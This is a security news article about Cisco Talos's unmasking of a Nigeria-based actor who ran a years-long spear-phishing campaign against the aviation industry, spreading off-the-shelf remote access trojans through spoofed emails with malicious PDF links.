The Trojan analysis lead to the attack on the aviation industry reveal

Researchers unmasked a two-year-long attack dubbed Operation Layover: the research began with a tweet

Aviation industry targeted by a threat actor from NigeriaThe attack was flagged back in May, but the infection chain was active for at least two years

A lengthy email phishing campaign aimed at the aviation sector was revealed.[1] It all started in May when the Microsoft Security Intelligence team tweeted about travel and aero industries-targeting spear-phishing[2] attacks distributing RevengeRAT/AsyncRAT. Attackers from Nigeria managed to carry out small-scale cyber threats for extended periods and staying under the radar.

Cisco Talos researchers state that attack emails focused on off-the-shelf malware spreading. Email campaigns distributed around the world and affected companies connected with commercial aviation. Also that the actors have been actively operating since at least 2013 in similar campaigns. The aviation industry has been the target for at least two years.[3]

We believe the actor is based out of Nigeria with a high degree of confidence and doesn't seem to be technically sophisticated, using off-the-shelf malware since the beginning of its activities without developing its own malware. The actor also buys the crypters that allow the usage of such malware without being detected, throughout the years it has used several different cryptors, mostly bought on online forums.

Email spoofing helped pretend that emails are sent from legitimate organizations in similar industries like the initial targets. The attached PDF files had embedded links with malicious VBScript that triggered the drop of trojan payloads on the machine. Then the malware would run its data exfiltration methods to obtain credit card details, credentials, screenshots, and spy on users via webcams.[4]

The particular Nigerian threat actor was investigated further

The attack focused on stealing cookies, login information was, now known, held by a malicious threat actor from Nigeria. These credentials can be offered to more technically advanced criminals after the initial espionage, so the data exfiltration would be a minor issue when compared to possible attacks involving ransomware and business email compromise. Gathering vulnerable data about organizations can pay out majorly since there are many buyers who can bid large amounts for such info.

Such tokens as valid credentials are valuable, so it is not a surprise that criminals are driven by malicious activities and possible financial gains. The money-driven attacker was deeply researched using DNS telemetry, analyzing IP addresses, domains. The majority of those linked domains showed the Nigerian locations. The analysis revealed email address, telegram app handle, and other user accounts like Skype associated with the criminal. Based on these details, other campaigns starting in 2013 were linked to the particular akconsult keyword and user accounts.

With the help of other researchers, the full identity of this attacker got revealed on social media. The longer such a person operates, the more fingerprints get left behind, according to researchers. Every attack and all the findings can be stored and used to profile the attacker for possible links in the future.[5]

Little technical knowledge does not stop criminals

Attackers used various techniques and remote access trojans like Agent Tesla[6] in this attack aiming at data exfiltration. Despite being new in the field and lacking sophistication, threat attackers manage to operate these tools successfully and steal needed and valuable information. Such espionage campaigns can pose a huge risk to corporations given the right conditions.

In this case, we have shown that what seemed like a simple campaign is, in fact, a continuous operation that has been active for three years, targeting an entire industry.

Unfortunately, the travel industry is always a great target for these malicious attackers because of the tempting profit. Countries tend to nationalize airlines to have internal operations data. However, the valuable information is related to schedules and particular patterns linked with individuals. Details like that can be useful for the initial exfiltration operator and make criminals richer when the information is breached or sold.

About the author
Gabriel E. Hall
Gabriel E. Hall - Passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.

Contact Gabriel E. Hall
About the company Esolutions